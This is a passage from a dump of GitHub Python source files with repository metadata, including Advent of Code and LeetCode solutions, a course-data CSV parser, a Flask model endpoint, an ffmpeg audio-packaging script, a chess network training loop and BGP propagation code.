s[i]==s[k]:\r\n dp[i][j]=min(dp[i][j],dp[i][k-1]+(dp[k+1][j] if j>k else 0))\r\n\r\n return dp[0][n-1] ","repo_name":"MonitSharma/LeetCode-Solutions","sub_path":"664-Strange-printer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"69982174180","text":"class TreeHouse:\n \"\"\"\n Main class based solution containing methods for solving Day Eight of the Advent of Code 2022.\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"\n Initializer for class level variables.\n \"\"\"\n self.length = None\n self.height = None\n self.grid_map = self.construct_data(\"input.txt\")\n self.set_grid_dimensions()\n\n @staticmethod\n def construct_data(file_name: str) -> list:\n \"\"\"\n Constructs the data set provided in `input.txt` into a list of section assignment pairs.\n\n :param file_name: The file name to read into memory.\n :return: A list containing the `assignment pairs` to be searched.\n \"\"\"\n with open(file_name, 'r') as file_object:\n data = [row.strip() for row in file_object.readlines()]\n grid_map = []\n\n for row in data:\n grid_map.append([eval(row) for row in [*row]])\n\n return grid_map\n\n def set_grid_dimensions(self) -> None:\n \"\"\"\n Sets the length and height of the `grid` for iteration.\n \"\"\"\n self.length = len(self.grid_map[0])\n self.height = len(self.grid_map)\n\n def is_boundary(self, row, column) -> bool:\n \"\"\"\n This method determines whether the current `pointer` location within the `grid` of tree heights is on the edge\n or boundary of the map.\n\n :return: A boolean true or false.\n \"\"\"\n return row == 0 or row == self.height - 1 or column == 0 or column == self.length - 1\n\n def is_taller(self, row: int, column: int, tree: int) -> bool:\n \"\"\"\n This method determines whether the supplied `tree` parameter is of a greater or equal value\n to the provided tree in the provided `row` and `column` of the `grid`.\n\n :return: A boolean true or false.\n \"\"\"\n return self.grid_map[row][column] >= tree\n\n def part_one_search(self) -> int:\n \"\"\"\n Searches the `grid` for all trees and determines their visibility by comparing the `height` of a given tree\n against all surrounding trees.\n\n :return: An integer corresponding to the total number of trees visible from outside the grid.\n \"\"\"\n visible_trees = 0 # Counter for the number of visible trees in the grid\n for row in range(self.height):\n for column in range(self.length):\n if self.is_boundary(row, column):\n visible_trees += 1\n continue\n\n tree = self.grid_map[row][column]\n\n for k in range(0, row): # Check north\n if self.is_taller(k, column, tree):\n break\n else:\n visible_trees += 1\n continue\n\n for k in range(row + 1, self.height): # Check south\n if self.is_taller(k, column, tree):\n break\n else:\n visible_trees += 1\n continue\n\n for k in range(0, column): # Check east\n if self.is_taller(row, k, tree):\n break\n else:\n visible_trees += 1\n continue\n\n for k in range(column + 1, self.length): # Check west\n if self.is_taller(row, k, tree):\n break\n else:\n visible_trees += 1\n continue\n\n return visible_trees\n\n def part_two_search(self) -> int:\n \"\"\"\n Searches for the highest `scenic score` possible for any given `tree` within the `grid` map of trees. 
A tree's\n        `scenic score` is found by multiplying together its viewing distance in each of the four cardinal directions,\n        e.g., `(north * south * east * west)`.\n\n        :return: An integer corresponding to the maximum scenic score possible for any tree.\n        \"\"\"\n        scenic_score = 0  # Initialise the maximum scenic score\n\n        for row in range(self.height):  # Iterate over all the trees in the grid.\n            for column in range(self.length):\n                tree = self.grid_map[row][column]  # Set the tree\n                score = 1  # Initialise a score tracker\n                counter = 0  # Initialise a counter variable\n\n                for k in reversed(range(0, row)):  # Check north\n                    counter += 1\n                    if self.grid_map[k][column] >= tree:\n                        break\n\n                score *= counter  # Multiply the score by the counter\n                counter = 0  # Reset the counter\n\n                for k in range(row + 1, self.height):  # Check south\n                    counter += 1\n                    if self.grid_map[k][column] >= tree:\n                        break\n\n                score *= counter  # Multiply the score by the counter\n                counter = 0  # Reset the counter\n\n                for n in reversed(range(0, column)):  # Check east\n                    counter += 1\n                    if self.grid_map[row][n] >= tree:\n                        break\n\n                score *= counter  # Multiply the score by the counter\n                counter = 0  # Reset the counter\n\n                for n in range(column + 1, self.length):  # Check west\n                    counter += 1\n                    if self.grid_map[row][n] >= tree:\n                        break\n\n                score *= counter  # Multiply the score by the counter\n                scenic_score = max(scenic_score, score)  # Update the maximum scenic score\n\n        return scenic_score\n\n    def solve(self) -> None:\n        \"\"\"\n        Simple wrapper method to print results to the console.\n        \"\"\"\n        print(\"Part One (1):\", self.part_one_search())\n        print(\"Part Two (2):\", self.part_two_search())\n\n\nif __name__ == \"__main__\":\n    tree_house = TreeHouse()\n    tree_house.solve()\n","repo_name":"jamestkelly/advent-of-code-2022","sub_path":"day-8-treetop-tree-house/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"71987796900","text":"# First use quick sort to sort the array. If a number appears more than half the time,\n# it must be at the middle position of the sorted array. Take the middle element directly,\n# traverse to count its occurrences; if the count exceeds half the length, return it, otherwise return 0\nclass Solution:\n    # quick sort\n    def quickSort(self, alist):\n        self.quickSortHelper(alist, 0, len(alist) - 1)\n    def quickSortHelper(self, alist, first, last):\n        if first < last:\n            splitspot = self.partition(alist, first, last)\n            self.quickSortHelper(alist, first, splitspot - 1)\n            self.quickSortHelper(alist, splitspot + 1, last)\n    \n    def partition(self, alist, first, last):\n        pivotvalue = alist[first]\n        finished = False\n        left = first + 1\n        right = last\n        while not finished:\n            while left <= right and alist[left] <= pivotvalue:\n                left += 1\n            while left <= right and alist[right] >= pivotvalue:\n                right -= 1\n            if left > right:\n                finished = True\n            else:\n                alist[left], alist[right] = alist[right], alist[left]\n        alist[first], alist[right] = alist[right], alist[first]\n        return right \n    \n    def findNum(self, alist):\n        self.quickSort(alist)\n        mid = len(alist) // 2\n        count = 0\n        for num in alist:\n            if num == alist[mid]:\n                count += 1\n        return alist[mid] if count > len(alist) / 2 else 0\n\n# test\ntest = Solution()\nalist = [1, 2, 3, 2, 2, 2, 5, 4, 2]\nprint(test.findNum(alist))\nalist = [1, 2, 3, 2, 2, 2, 5, 4, 2, 6, 7, 8, 9]\nprint(test.findNum(alist))","repo_name":"EuniceF/InterviewAlgorithm","sub_path":"29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"332258811","text":"#!/usr/bin/env 
python\nimport sys\nimport csv\nimport time\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\nfrom operator import itemgetter\n\n# author: eronning\n# description: parses course information pulled from Brown API\n# and gives each course a data point for each\n# minute that it is in session and bucketed based on\n# the day of the week that it is offered. this data is then\n# cleaned of invalid times (times when the ratty is not open), \n# sorted and written to a csv file (course_data_cleaned.csv).\n\ndata_path = '../../data/course/course_data.csv'\n\n# get_time_object gets a time object\n# @param time is the seconds since midnight\n# @param day_of_week is the day of the week\n# @param semester is the semester and year\n# return a time object containing time of day,\n# day of the week and the semester\ndef get_time_object(time, day_of_week, semester):\n\thours = time / 3600;\n\tminutes = (time % 3600) / 60;\n\ttime_object = {\n\t\t\"hour\" : hours,\n\t\t\"minute\" : minutes,\n\t\t\"day_of_week\" : day_of_week,\n\t\t\"semester\" : semester\n\t}\n\treturn time_object\n\n# key_from_time gets a key from a time object\n# @param time_object is a object containing time information\n# return a key for that time object\ndef key_from_time(time_object):\n\treturn str(time_object[\"semester\"]) + ',' + str(days[time_object[\"day_of_week\"]]) + ',' + str(time_object[\"hour\"]) + ',' + str(time_object[\"minute\"])\n\n# mapping days to their day of the week (index format)\ndays = {\"M\": 0, \"T\": 1, \"W\": 2, \"R\": 3, \"F\": 4}\n\ndef main():\n\t'''\n\tFor CSV:\n\t'''\n\twith open(data_path) as f:\n\t\treader = csv.reader(f)\n\t\theader = next(reader)\n\t\tcourse_data = {}\n\t\tstarting_grouping = defaultdict(list)\n\t\tending_grouping = defaultdict(list)\n\t\tfor row in reader:\n\t\t\t# grab information at each row\n\t\t\tsemester = row[0]\n\t\t\tsize = int(row[6]) - int(row[5])\n\t\t\tday_of_week = row[8]\n\t\t\tstart_time = int(row[9])\n\t\t\tend_time = int(row[10])\n\t\t\t# get time objects\n\t\t\tstart_time_object = get_time_object(start_time, day_of_week, semester)\n\t\t\tend_time_object = get_time_object(end_time, day_of_week, semester)\n\t\t\t# fill a object with information of that course\n\t\t\tcourse_info = {\n\t\t\t\t'semester'\t : semester,\n\t\t\t\t'course' : row[3],\n\t\t\t\t'title' : row[4],\n\t\t\t\t'num_people' : size,\n\t\t\t\t'location' : row[7],\n\t\t\t\t'day_of_week' : day_of_week,\n\t\t\t\t'start_time' : start_time_object,\n\t\t\t\t'end_time' : end_time_object\n\t\t\t}\n\t\t\tif day_of_week in days:\n\t\t\t\tkey = key_from_time(start_time_object)\n\t\t\t\tif key in course_data:\n\t\t\t\t\t# perform logic here\n\t\t\t\t\tdate = course_data[key]\n\t\t\t\t\t# get the connecting time values\n\t\t\t\t\tstart_hr = int(start_time_object[\"hour\"])\n\t\t\t\t\tstart_min = int(start_time_object[\"minute\"])\n\t\t\t\t\t# get the disconnecting time values\n\t\t\t\t\tend_hr = int(end_time_object[\"hour\"])\n\t\t\t\t\tend_min = int(end_time_object[\"minute\"])\n\t\t\t\t\t# set the timeslots\n\t\t\t\t\ttimeslot_hr = start_hr\n\t\t\t\t\ttimeslot_min = start_min\n\t\t\t\t\t# fill the timeslots with a course until tht times meet\n\t\t\t\t\twhile timeslot_hr != end_hr or timeslot_min != end_min:\n\t\t\t\t\t\t# add the course to the current timeslot\n\t\t\t\t\t\tdate[str(timeslot_hr) + \":\" + str(timeslot_min)].append(course_info)\n\t\t\t\t\t\t# update hr and min times\n\t\t\t\t\t\tif timeslot_min == 59:\n\t\t\t\t\t\t\ttimeslot_min = 0\n\t\t\t\t\t\t\ttimeslot_hr += 
1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttimeslot_min += 1\n\t\t\t\telse:\n\t\t\t\t\tcourse_data[key] = defaultdict(list)\n\n\t\t# Clean information and write it to a csv\n\t\twith open('../../data/course/course_data_cleaned.csv', 'wb') as cf:\n\t\t\tcsv_writer = csv.writer(cf)\n\t\t\tcsv_writer.writerow(['semester', 'week_day', 'hour', 'minute', 'num_people'])\n\t\t\tcourse_time_data = defaultdict(list)\n\t\t\t# iterate through all days\n\t\t\tfor date in course_data:\n\t\t\t\tdate_data = date.split(\",\")\n\t\t\t\tday = course_data[date]\n\t\t\t\t# check if the day has any timeslots\n\t\t\t\tif day:\n\t\t\t\t\t# iterate through each timeslote\n\t\t\t\t\tfor timeslot in day:\n\t\t\t\t\t\ttimeslot_data = timeslot.split(\":\")\n\t\t\t\t\t\t# pulling out the num people \n\t\t\t\t\t\tnum_people = sum([data['num_people'] for data in day[timeslot]])\n\t\t\t\t\t\t# building a row for that timeslot\n\t\t\t\t\t\ttime = [date_data[0], date_data[1], int(timeslot_data[0]), int(timeslot_data[1]), int(num_people)]\n\t\t\t\t\t\tcourse_timeslot_key = date_data[0] + ',' + date_data[1] + ',' + timeslot_data[0] + ',' + timeslot_data[1]\n\t\t\t\t\t\t# add data to map for combination\n\t\t\t\t\t\tcourse_timeslot = course_time_data[course_timeslot_key]\n\t\t\t\t\t\ttimeslot_hour = int(timeslot_data[0])\n\t\t\t\t\t\ttimeslot_min = int(timeslot_data[1])\n\t\t\t\t\t\tif not ((0 <= timeslot_hour <= 7) or (19 < timeslot_hour <= 23) or (timeslot_hour == 7 and timeslot_min > 30)):\n\t\t\t\t\t\t\tcourse_timeslot.append(time)\n\t\t\t\t\t\tcourse_time_data[course_timeslot_key] = course_timeslot\n\n\n\t\t\tcombined_course_data = []\n\t\t\t# combine same timeslots\n\t\t\tfor timeslot in course_time_data:\n\t\t\t\tdata = course_time_data[timeslot]\n\t\t\t\tif data:\n\t\t\t\t\tnum_people = sum([d[4] for d in data])\n\t\t\t\t\treference = data[0]\n\t\t\t\t\tcombined_time = [reference[0], reference[1], reference[2], reference[3], num_people]\n\t\t\t\t\tcombined_course_data.append(combined_time)\n\t\t\t\t\n\t\t\t# sort the information\n\t\t\tsorted_course_data = sorted(combined_course_data, key=itemgetter(0,1,2,3))\n\n\t\t\t# write all of the information to a csv\n\t\t\tfor time in sorted_course_data:\n\t\t\t\tcsv_writer.writerow(time)\n\n\tpass\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"eronning/MenuSignificance","sub_path":"code/course/parse_course_data.py","file_name":"parse_course_data.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14478863930","text":"import pickle\nimport numpy as np\nfrom pathlib import Path\n\nfrom flask import Flask, request, jsonify\n\nimport xgboost as xgb\n\n\nMODELS_DIR = './models'\n\n\nmodel_path = Path(MODELS_DIR) / 'model.bin'\nwith open(model_path, 'rb') as f_in:\n model = pickle.load(f_in)\n\napp = Flask('concrete_strength_est')\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n sample = request.get_json()\n print(sample)\n dval = xgb.DMatrix([np.array(sample)])\n strength = model.predict(dval)\n result = {\n 'strength': float(strength[0])\n }\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=9696)","repo_name":"ngalkov/mlzoomcamp_midterm","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1441173645","text":"from sqlalchemy import select\n\nfrom core.models.product 
import Product\nfrom core.models.user import User\n\n\"\"\" use case tests for create tables \"\"\"\n\n\ndef test_create_product(session):\n new_product = Product(\n description='Suco de Laranja 400ml',\n price=7.0,\n type='suco',\n )\n session.add(new_product)\n session.commit()\n\n product = session.scalar(\n select(Product).where(Product.description == 'Suco de Laranja 400ml')\n )\n\n assert product.description == 'Suco de Laranja 400ml'\n\n\ndef test_create_user(session):\n new_user = User(\n name='Maercio Mamedes',\n email='maerciomamedes@hotmail.com',\n password='secret_key',\n )\n\n session.add(new_user)\n session.commit()\n\n user = session.scalar(select(User).where(User.name == 'Maercio Mamedes'))\n assert user.name == 'Maercio Mamedes'\n","repo_name":"MaercioMamedes/Restaurant-Web-Service","sub_path":"tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36782907348","text":"#!/usr/bin/python\nimport os, sys, getopt, shutil, ntpath\nimport audio, resource\n\ndef CreateResourceFiles(params):\n output = params[\"output\"]\n cache = params[\"cache\"]\n name = params[\"name\"]\n\n paths = resource.CreateOutline(output, cache, name)\n resource.CopyFromCache(cache, paths)\n resource.WriteSourceFiles(name, paths)\n\n return params\n\n\ndef ProcessFileByFfmpeg(params):\n cache = params[\"cache\"]\n files = params[\"files\"]\n\n filesMax = len(files)\n filesCurrent = 1\n\n for file in files:\n #if filesCurrent > 3: break\n fileName = os.path.splitext(ntpath.basename(file))[0]\n\n audio.TryAndConvertToSuitableFormat(\n filesCurrent, filesMax,\n file, fileName, cache,\n )\n\n filesCurrent = filesCurrent + 1\n\n return params\n\ndef EnumerateInputDirectoryFiles(params):\n inputDir = params[\"input\"]\n extensions = params[\"extensions\"]\n\n soundFiles = []\n for item in os.listdir(inputDir):\n itemPath = os.path.join(inputDir, item)\n itemExt = os.path.splitext(item)[1].replace(\".\", \"\")\n\n if not itemExt in extensions:\n print(\"Ineligible file found: \" + item)\n continue\n\n if os.path.isfile(itemPath):\n soundFiles.append(itemPath)\n\n\n if len(soundFiles) == 0:\n CrashAndBurn(4, \"Given directory doesn't have any suitable files to use.\")\n\n print(\"Found \" + str(len(soundFiles)) + \" sound files\")\n params[\"files\"] = soundFiles\n return params\n\n\ndef CreateCacheFolder(params):\n cacheDir = os.path.join(os.getcwd(), \"cache\")\n\n if os.path.exists(cacheDir):\n shutil.rmtree(cacheDir)\n \n os.mkdir(cacheDir)\n\n params[\"cache\"] = cacheDir\n\n print(\"Cache directory is \" + cacheDir)\n\n return params\n\ndef NotifyIncorrectUsage(reason):\n print(\"baker.py [--in, -i] [--out, -o] [--name, -n] \")\n print(\"Fail reason: \" + reason)\n sys.exit(1)\n\ndef CrashAndBurn(code, reason):\n print(\"baker.py encountered an issue while executing.\")\n print(\"Fail reason: \" + reason)\n sys.exit(code)\n\ndef main(argv):\n params = {\n \"input\": \"\",\n \"output\": \"\",\n \"name\": \"\",\n \"cache\": \"\",\n \"files\": \"\",\n \"extensions\": audio.GetExtensionsSupported()\n }\n\n try:\n opts, _ = getopt.getopt(argv, \"i:n:o:\", [ \"in=\", \"name=\", \"out=\" ])\n except getopt.GetoptError:\n NotifyIncorrectUsage(\"error during parsing of arguments.\")\n\n argCount = 0\n\n for opt, arg in opts:\n if opt in (\"-i\", \"--in\"):\n params[\"input\"] = arg\n argCount += 1\n elif opt in (\"-n\", \"--name\"):\n params[\"name\"] = arg\n argCount += 1\n 
elif opt in (\"-o\", \"--out\"):\n params[\"output\"] = arg \n argCount += 1\n \n if argCount < 3:\n NotifyIncorrectUsage(\"Missing required arguments.\")\n \n if os.path.exists(params[\"input\"]) == False:\n CrashAndBurn(5, \"Input folder does not exist.\")\n\n print(\"Parameters are OK\")\n\n params = CreateCacheFolder(params)\n params = EnumerateInputDirectoryFiles(params)\n params = ProcessFileByFfmpeg(params)\n params = CreateResourceFiles(params)\n \nif __name__ == \"__main__\":\n didFindReqs = audio.CheckPrerequisites();\n\n if not didFindReqs:\n CrashAndBurn(2, \"No ffmpeg or ffprobe installation found. Please install ffmpeg suite and add it to your PATH varible.\\n\\tTo sanity check, open up a command line and enter 'ffmpeg' and 'ffprobe' to see if it are valid commands.\")\n\n main(sys.argv[1::])\n","repo_name":"manzarek123/gta-native-audio","sub_path":"_audiogen/baker.py","file_name":"baker.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11121343087","text":"import glob\nimport json\nimport os\nfrom collections import deque\nfrom concurrent.futures import ProcessPoolExecutor\nfrom random import shuffle\n\nimport numpy as np\nimport torch\nfrom tensorboard.program import TensorBoard\nfrom torch.optim import Adam\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom aki_chess_ai.ChessPolicyNetwork import ChessPolicyNetwork\nfrom aki_chess_ai.ChessValueNetwork import ChessValueNetwork\nfrom aki_chess_ai.umgebung.ChessEnv import testeval\nfrom aki_chess_ai.utils import getStateFromFEN\n\n\ndef getGameDataFilenames():\n # Get all files in ./data/play_data/*\n files = glob.glob(os.path.join(\"../data/play_data\", \"*.json\"))\n # Sort by creation time\n files.sort(key=os.path.getctime)\n return files\n\n\ndef read_game_data_from_file(path):\n try:\n with open(path, \"rt\") as f:\n return json.load(f)\n except Exception as e:\n print(e)\n\n\ndef load_data_from_file(filename):\n data = read_game_data_from_file(filename)\n return convert_to_cheating_data(data)\ndef is_black_turn(fen):\n return fen.split(\" \")[1] == 'b'\n\ndef convert_to_cheating_data(data):\n \"\"\"\n :param data: format is SelfPlayWorker.buffer -> [(state_fen, policy, value)]\n :return:\n \"\"\"\n state_list = []\n policy_list = []\n value_list = []\n for state_fen, policy, value in data:\n\n network_input = getStateFromFEN(state_fen, 1 if not is_black_turn(state_fen) else -1)\n move_number = int(state_fen.split(' ')[5])\n value_certainty = min(5, move_number)/5 # reduces the noise of the opening...\n\n # Test eval is the evaluation of the strength of the current position\n sl_value = value*value_certainty + testeval(state_fen, False)*(1-value_certainty)\n\n state_list.append(network_input)\n policy_list.append(policy)\n value_list.append(sl_value)\n\n return np.asarray(state_list, dtype=np.float32), np.asarray(policy_list, dtype=np.float32), np.asarray(value_list, dtype=np.float32)\nclass NetworkOptimizer:\n def __init__(self, lr=0.001, max_epochs=40):\n \"\"\"\n :param lr: learning rate\n \"\"\"\n self.filenames = None\n self.lr = lr\n self.max_epochs = max_epochs\n self.global_step = 0\n\n self.dataset_size = 100000\n\n self.policy_model: ChessPolicyNetwork = None\n self.value_model: ChessValueNetwork = None\n self.dataset = deque(), deque(), deque()\n\n def start(self):\n self.policy_model, self.value_model = self.load_model()\n self.train()\n\n def train(self):\n \"\"\"\n Trains the policy and value 
network.\n :return: schmerzen im debuggen\n \"\"\"\n\n # Config the Models for training wiht Optimizer and Loss Function\n self.config_models()\n self.filenames = deque(getGameDataFilenames())\n self.writer = SummaryWriter(log_dir=\"../logs\")\n # Randomize the order of the files\n shuffle(self.filenames)\n\n total_steps = 0\n total_epochs = 0 # count the total number of epochs\n while total_epochs < self.max_epochs: # stop when max_epochs is reached\n self.fill_queue()\n steps = self.train_epoch()\n total_steps += steps\n total_epochs += 1\n print(f\"Trained {steps} steps in epoch {total_epochs}.\")\n if(total_epochs % 10 == 0):\n self.save_current_model()\n a, b, c = self.dataset\n while len(a) > self.dataset_size:\n a.popleft()\n b.popleft()\n c.popleft()\n\n def train_epoch(self, epochs=1, batch_size=256):\n \"\"\"\n Trains the model for epochs.\n\n :epochs: number of epochs to train\n :return: number of steps\n \"\"\"\n state_array, policy_array, value_array = self.collect_all_loaded_data()\n\n num_batches = len(state_array) // batch_size\n for epoch in range(epochs):\n for batch_idx in range(num_batches):\n # Get the current batch\n start_idx = batch_idx * batch_size\n end_idx = start_idx + batch_size\n state_batch = torch.tensor(state_array[start_idx:end_idx])\n policy_batch = torch.tensor(policy_array[start_idx:end_idx])\n value_batch = torch.tensor(value_array[start_idx:end_idx])\n\n # Train the policy network\n self.policy_model.optimizer.zero_grad()\n policy_pred = self.policy_model(state_batch)\n policy_loss = self.policy_model.loss_function(policy_pred, policy_batch)\n policy_loss.backward()\n self.policy_model.optimizer.step()\n\n\n\n # Train the value network\n self.value_model.optimizer.zero_grad()\n value_pred = self.value_model(state_batch)\n value_batch = value_batch.view(-1, 1) # reshape value_batch to match value_pred\n value_loss = self.value_model.loss_function(value_pred, value_batch)\n value_loss.backward()\n self.value_model.optimizer.step()\n\n # Log the losses\n self.writer.add_scalar(\"Loss/Policy\", policy_loss.item(), global_step=self.global_step)\n self.writer.add_scalar(\"Loss/Value\", value_loss.item(), global_step=self.global_step)\n self.global_step += 1\n\n\n steps = (state_array.shape[0] //batch_size) * epochs\n return steps\n\n\n def load_model(self) -> (ChessPolicyNetwork, ChessValueNetwork):\n policy_model = ChessPolicyNetwork()\n value_model = ChessValueNetwork()\n\n policy_model, value_model = self.load_latest_checkpoint(\"../\", policy_model, value_model)\n\n return policy_model, value_model\n\n def load_latest_checkpoint(self, folder, policy_model, value_model):\n print(\"Loading latest checkpoint...\")\n policy_folder = os.path.join(folder, \"policy_training_models\")\n value_folder = os.path.join(folder, \"value_training_models\")\n\n value_checkpoints = glob.glob(os.path.join(value_folder, 'model_*.pt'))\n policy_checkpoints = glob.glob(os.path.join(policy_folder, 'model_*.pt'))\n\n # Find the latest checkpoint (highest number in the filename)\n latest_value_checkpoint = max(value_checkpoints, key=os.path.getctime)\n latest_policy_checkpoint = max(policy_checkpoints, key=os.path.getctime)\n\n value_model.load_state_dict(torch.load(latest_value_checkpoint))\n policy_model.load_state_dict(torch.load(latest_policy_checkpoint))\n\n print(\"Loaded latest value model from:\", latest_value_checkpoint)\n print(\"Loaded latest policy model from:\", latest_policy_checkpoint)\n print(\"Loading checkpoint done.\")\n\n return policy_model, value_model\n\n 
def save_current_model(self):\n folder = \"../\"\n # Check if folder exists, if not, create it\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n policy_folder = os.path.join(folder, \"policy_training_models\")\n value_folder = os.path.join(folder, \"value_training_models\")\n\n if not os.path.exists(policy_folder):\n os.makedirs(policy_folder)\n\n if not os.path.exists(value_folder):\n os.makedirs(value_folder)\n\n # Get the next checkpoint number for each model\n value_checkpoints = glob.glob(os.path.join(value_folder, 'model_*.pt'))\n policy_checkpoints = glob.glob(os.path.join(policy_folder, 'model_*.pt'))\n checkpointNumberPolicy = 0\n checkpointNumberValue = 0\n\n if len(value_checkpoints) > 0:\n # sort numerically so that model_10.pt comes after model_9.pt\n value_checkpoints.sort(key=lambda p: int(p.split('_')[-1].split('.')[0]))\n checkpointNumberValue = int(value_checkpoints[-1].split('_')[-1].split('.')[0]) + 1\n if len(policy_checkpoints) > 0:\n policy_checkpoints.sort(key=lambda p: int(p.split('_')[-1].split('.')[0]))\n checkpointNumberPolicy = int(policy_checkpoints[-1].split('_')[-1].split('.')[0]) + 1\n\n value_filepath = os.path.join(folder, f\"value_training_models/model_{checkpointNumberValue}.pt\")\n policy_filepath = os.path.join(folder, f\"policy_training_models/model_{checkpointNumberPolicy}.pt\")\n\n torch.save(self.value_model.state_dict(), value_filepath)\n torch.save(self.policy_model.state_dict(), policy_filepath)\n\n print(\"Model saved in file:\", value_filepath)\n print(\"Model saved in file:\", policy_filepath)\n\n def config_models(self):\n opt_policy = Adam(params=self.policy_model.parameters(), lr=self.lr)\n opt_value = Adam(params=self.value_model.parameters(), lr=self.lr)\n\n self.policy_model.train()\n self.policy_model.optimizer = opt_policy\n self.policy_model.loss_function = torch.nn.CrossEntropyLoss()\n self.policy_model.loss_weight = 1.5\n\n self.value_model.train()\n self.value_model.optimizer = opt_value\n self.value_model.loss_function = torch.nn.MSELoss()\n self.value_model.loss_weight = 1\n\n def fill_queue(self):\n \"\"\"\n Fill the queue with data from the files in the filenames queue.\n :return:\n \"\"\"\n\n futures = deque()\n # RAM-hungry: several game files are loaded into memory at once\n with ProcessPoolExecutor(max_workers=3) as executor:\n for _ in range(3):\n if len(self.filenames) == 0:\n break\n filename = self.filenames.popleft()\n print(f\"loading data from {filename}\")\n # Append Data to the queue\n futures.append(executor.submit(load_data_from_file, filename))\n\n while futures and len(self.dataset[0]) < self.dataset_size:\n for x, y in zip(self.dataset, futures.popleft().result()):\n x.extend(y)\n if len(self.filenames) > 0:\n filename = self.filenames.popleft()\n print(f\"loading data from {filename}\")\n futures.append(executor.submit(load_data_from_file, filename))\n\n def collect_all_loaded_data(self):\n \"\"\"\n :return: a tuple containing the data in self.dataset, split into\n (state, policy, and value).\n \"\"\"\n state_ary, policy_ary, value_ary = self.dataset\n\n state_ary1 = np.asarray(state_ary, dtype=np.float32)\n policy_ary1 = np.asarray(policy_ary, dtype=np.float32)\n value_ary1 = np.asarray(value_ary, dtype=np.float32)\n return state_ary1, policy_ary1, value_ary1\n\n\ndef main():\n optimizer = NetworkOptimizer()\n optimizer.start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"DennisBaerXY/alpha-zero-style-chess","sub_path":"src/aki_chess_ai/agents/NetworkOptimizer.py","file_name":"NetworkOptimizer.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
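Still on the NetworkOptimizer record above: train_epoch slices NumPy arrays by hand and rebuilds tensors every step. A minimal sketch of the same batching done with torch.utils.data, assuming the three arrays share their first dimension; the helper is illustrative, not part of the original repository:

import numpy as np
import torch
from torch.utils.data import DataLoader, TensorDataset

def make_loader(states: np.ndarray, policies: np.ndarray, values: np.ndarray,
                batch_size: int = 256) -> DataLoader:
    # One dataset yields (state, policy, value) triples, batched and shuffled
    dataset = TensorDataset(torch.from_numpy(states),
                            torch.from_numpy(policies),
                            torch.from_numpy(values))
    # drop_last=True mirrors the original len(state_array) // batch_size truncation
    return DataLoader(dataset, batch_size=batch_size, shuffle=True, drop_last=True)

Each iteration over the loader then yields ready-made state, policy, and value batches, and shuffling removes any dependence on file load order.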
 +{"seq_id":"40635619586","text":"from bgpy.caida_collector import AS\n\nfrom bgpy.simulation_engine.announcement import Announcement as Ann\nfrom bgpy.enums import Relationships\n\n\ndef propagate_to_providers(self):\n \"\"\"Propagates to providers\n\n Propagate anns that have a recv_rel of origin or customer to providers\n \"\"\"\n\n send_rels: set[Relationships] = set([Relationships.ORIGIN, Relationships.CUSTOMERS])\n self._propagate(Relationships.PROVIDERS, send_rels)\n\n\ndef propagate_to_customers(self):\n \"\"\"Propagates to customers\"\"\"\n\n # Anns that have any of these as recv_rel get propagated\n send_rels: set[Relationships] = set(\n [\n Relationships.ORIGIN,\n Relationships.CUSTOMERS,\n Relationships.PEERS,\n Relationships.PROVIDERS,\n ]\n )\n self._propagate(Relationships.CUSTOMERS, send_rels)\n\n\ndef propagate_to_peers(self):\n \"\"\"Propagates to peers\"\"\"\n\n # Anns that have any of these as recv_rel get propagated\n send_rels: set[Relationships] = set([Relationships.ORIGIN, Relationships.CUSTOMERS])\n self._propagate(Relationships.PEERS, send_rels)\n\n\ndef _propagate(self, propagate_to: Relationships, send_rels: set[Relationships]):\n \"\"\"Propagates announcements from local rib to other ASes\n\n send_rels is the set of relationships that are acceptable to send\n \"\"\"\n\n for neighbor in getattr(self, propagate_to.name.lower()):\n for prefix, ann in self._local_rib.prefix_anns():\n if ann.recv_relationship in send_rels and not self._prev_sent(\n neighbor, ann\n ):\n propagate_args = [neighbor, ann, propagate_to, send_rels]\n # Policy took care of its own propagation for this ann\n if self._policy_propagate(*propagate_args):\n continue\n else:\n self._process_outgoing_ann(*propagate_args)\n\n\ndef _policy_propagate(*args, **kwargs) -> bool:\n \"\"\"Custom policy propagation that can be overridden\"\"\"\n\n return False\n\n\n
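Since _policy_propagate above always returns False, _process_outgoing_ann handles every announcement. A sketch of how a policy subclass could use the hook to silently drop some announcements instead of sending them; the class, the cutoff, and the as_path attribute are illustrative assumptions, not taken from bgpy:

class DropLongPaths:
    """Illustrative policy mixin: drop announcements with long AS paths."""

    MAX_PATH_LEN = 10  # hypothetical cutoff

    def _policy_propagate(self, neighbor, ann, propagate_to, send_rels) -> bool:
        # Returning True tells _propagate that the policy already handled this
        # announcement, so it is dropped rather than passed to _process_outgoing_ann
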